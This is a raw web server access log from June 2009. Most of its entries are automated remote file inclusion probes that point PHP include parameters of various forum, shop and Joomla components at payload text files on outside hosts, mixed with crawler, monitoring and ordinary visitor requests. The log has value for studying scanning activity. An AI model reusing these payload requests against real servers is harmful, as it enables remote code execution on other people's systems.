67.15.171.4 - - [22/Jun/2009:01:51:05 -0400] "GET /logs/access_log.Q109060900%20%20/?sIncPath=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.15.171.4 - - [22/Jun/2009:01:51:10 -0400] "GET /?sIncPath=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
67.15.171.4 - - [22/Jun/2009:01:51:10 -0400] "GET /logs/?sIncPath=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
67.15.171.4 - - [22/Jun/2009:01:51:10 -0400] "GET /logs/access_log.Q109060900%20%20/?sIncPath=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.15.171.4 - - [22/Jun/2009:01:51:10 -0400] "GET /logs/access_log.Q109053100%20%20/?sIncPath=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.249.71.14 - - [22/Jun/2009:01:54:21 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0048644B1D22B100301E04S+WSEQ(S0060):1+OUITEM(A0200):04941202 HTTP/1.1" 200 27019 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.237.201.58 - - [22/Jun/2009:01:54:31 -0400] "GET /logs/access_log.Q109050900//shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 239 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.237.201.58 - - [22/Jun/2009:01:54:32 -0400] "GET //shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
209.59.12.99 - - [22/Jun/2009:01:55:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.237.201.58 - - [22/Jun/2009:01:55:12 -0400] "GET /logs/access_log.Q109050900//shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
85.237.201.58 - - [22/Jun/2009:01:55:12 -0400] "GET //shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
85.237.201.58 - - [22/Jun/2009:01:55:13 -0400] "GET /logs//shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.803"
85.237.201.58 - - [22/Jun/2009:01:55:55 -0400] "GET //shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
95.168.170.105 - - [22/Jun/2009:01:56:19 -0400] "GET //shop/main.php?_shop_path=http://www.thelegalnews.com/nav/r57/test.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
95.168.170.105 - - [22/Jun/2009:01:56:19 -0400] "GET /logs//shop/main.php?_shop_path=http://www.thelegalnews.com/nav/r57/test.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
217.29.159.130 - - [22/Jun/2009:01:56:37 -0400] "GET //shop/main.php?_shop_path=http://propertiesmalaysia.com.my/ugc_files/test.txt?? HTTP/1.1" 404 212 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
217.29.159.130 - - [22/Jun/2009:01:56:37 -0400] "GET /logs//shop/main.php?_shop_path=http://propertiesmalaysia.com.my/ugc_files/test.txt?? HTTP/1.1" 404 217 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
67.15.171.4 - - [22/Jun/2009:01:57:46 -0400] "GET /logs/access_log.Q109060900/?sIncPath=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
67.15.171.4 - - [22/Jun/2009:01:57:46 -0400] "GET /logs/access_log.Q109053100/?sIncPath=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
67.15.171.4 - - [22/Jun/2009:01:57:52 -0400] "GET /logs/access_log.Q109053100/?sIncPath=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
67.15.171.4 - - [22/Jun/2009:01:57:52 -0400] "GET /logs/access_log.Q109060900/?sIncPath=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:01:59:46 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:01:59:46 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:01:59:46 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
222.64.163.155 - - [22/Jun/2009:01:59:46 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; 360SE)"
222.64.163.155 - - [22/Jun/2009:01:59:46 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; 360SE)"
222.64.163.155 - - [22/Jun/2009:01:59:50 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; 360SE)"
222.64.163.155 - - [22/Jun/2009:01:59:51 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; 360SE)"
85.237.201.58 - - [22/Jun/2009:01:59:57 -0400] "GET /logs/error_log.Q109050900//shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
222.122.179.44 - - [22/Jun/2009:02:00:02 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:02:00:02 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:02:00:02 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:02:00:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.94.125.100 - - [22/Jun/2009:02:00:14 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Jun/2009:02:00:14 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Jun/2009:02:00:14 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Jun/2009:02:00:14 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.94.249.34 - - [22/Jun/2009:02:02:38 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.225.217.11 - - [22/Jun/2009:02:03:00 -0400] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:03:00 -0400] "GET /logs/access_log.Q109061200//includes/ktedit/toolbar.php?dirDepth=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:03:00 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:03:01 -0400] "GET /logs/access_log.Q109050800//includes/ktedit/toolbar.php?dirDepth=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:02:03:15 -0400] "GET /index.php?page=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:02:03:15 -0400] "GET /logs/index.php?page=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:02:03:15 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:02:03:23 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:02:03:31 -0400] "GET /logs/access_log.Q109052400%20%20/index.php?page=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:02:03:31 -0400] "GET /logs/access_log.Q109061300%20%20/index.php?page=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:02:03:36 -0400] "GET /logs/index.php?page=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:02:03:36 -0400] "GET /index.php?page=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:02:03:36 -0400] "GET /logs/access_log.Q109052400%20%20/index.php?page=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:02:03:36 -0400] "GET /logs/access_log.Q109061300%20%20/index.php?page=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:02:05:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.223.3.98 - - [22/Jun/2009:02:06:49 -0400] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:02:06:50 -0400] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:02:06:53 -0400] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:02:06:53 -0400] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:02:06:54 -0400] "GET /logs/access_log.Q109061400%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:02:06:55 -0400] "GET /logs/access_log.Q109061400%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:02:06:56 -0400] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:02:06:56 -0400] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:02:06:57 -0400] "GET /logs/access_log.Q109061400//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:02:06:59 -0400] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:02:07:00 -0400] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:02:07:00 -0400] "GET /logs/access_log.Q109061400//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:07:25 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:07:25 -0400] "GET /logs/access_log.Q109061200/lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:07:26 -0400] "GET /lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:07:26 -0400] "GET /lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:07:26 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:07:26 -0400] "GET /logs/access_log.Q109061200/lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:07:37 -0400] "GET ///components/com_joomlaboard/standalone/stubjambo.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:07:37 -0400] "GET /logs///components/com_joomlaboard/standalone/stubjambo.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:07:38 -0400] "GET /logs/access_log.Q109051000///components/com_joomlaboard/standalone/stubjambo.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:02:07:49 -0400] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:02:07:49 -0400] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:02:07:49 -0400] "GET /logs/access_log.Q109061400//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:02:08:00 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:02:08:01 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.64.163.155 - - [22/Jun/2009:02:08:03 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; 360SE)"
222.64.163.155 - - [22/Jun/2009:02:08:03 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; 360SE)"
222.64.163.155 - - [22/Jun/2009:02:08:04 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; 360SE)"
222.64.163.155 - - [22/Jun/2009:02:08:04 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; 360SE)"
83.172.140.17 - - [22/Jun/2009:02:08:14 -0400] "GET /logs/access_log.Q109061200/lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:08:15 -0400] "GET /lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:08:15 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:02:08:21 -0400] "GET /logs/access_log.Q109052400//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
200.248.10.200 - - [22/Jun/2009:02:08:32 -0400] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.248.10.200 - - [22/Jun/2009:02:08:32 -0400] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.248.10.200 - - [22/Jun/2009:02:08:32 -0400] "GET /logs/access_log.Q109052900%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:08:47 -0400] "GET /logs/access_log.Q109060600/lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:08:48 -0400] "GET /logs/access_log.Q109060600/lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:09:01 -0400] "GET /logs/access_log.Q109061200/lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:09:01 -0400] "GET /lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:09:02 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:09:54 -0400] "GET /logs/access_log.Q109060600/lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:02:10:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.38.128.43 - - [22/Jun/2009:02:10:29 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.38.128.43 - - [22/Jun/2009:02:10:29 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.38.128.43 - - [22/Jun/2009:02:10:29 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.38.128.43 - - [22/Jun/2009:02:10:29 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:10:33 -0400] "GET /logs/access_log.Q109060600/lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.249.71.54 - - [22/Jun/2009:02:11:33 -0400] "GET /images/over-index19_tempindi.jpg HTTP/1.1" 200 2633 "-" "Googlebot-Image/1.0"
83.172.140.17 - - [22/Jun/2009:02:12:24 -0400] "GET /lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:12:24 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:12:24 -0400] "GET /logs/access_log.Q109061100%20%20/lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:12:25 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:12:25 -0400] "GET /lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:12:25 -0400] "GET /logs/access_log.Q109061100%20%20/lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:02:13:17 -0400] "GET /logs/access_log.Q109052400/index.php?page=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:02:13:17 -0400] "GET /logs/access_log.Q109061000/index.php?page=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:02:13:25 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:02:13:25 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:02:13:27 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:13:38 -0400] "GET /logs/access_log.Q109061200%20%20/lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
83.172.140.17 - - [22/Jun/2009:02:13:39 -0400] "GET /logs/access_log.Q109061200%20%20/lostpasswd.php?env[include_prefix]=http://abprogramlari.trakya.edu.tr/jabprogrami/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:13:41 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:13:41 -0400] "GET /logs/?sourcedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:13:42 -0400] "GET /?sourcedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:02:13:43 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.6.17.151 - - [22/Jun/2009:02:14:00 -0400] "GET /logs/access_log.Q108102400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.14 - - [22/Jun/2009:02:14:58 -0400] "GET /images/top_of_page.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
209.59.12.99 - - [22/Jun/2009:02:15:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.227.193.198 - - [22/Jun/2009:02:17:04 -0400] "GET /?sourcedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
58.227.193.198 - - [22/Jun/2009:02:17:10 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
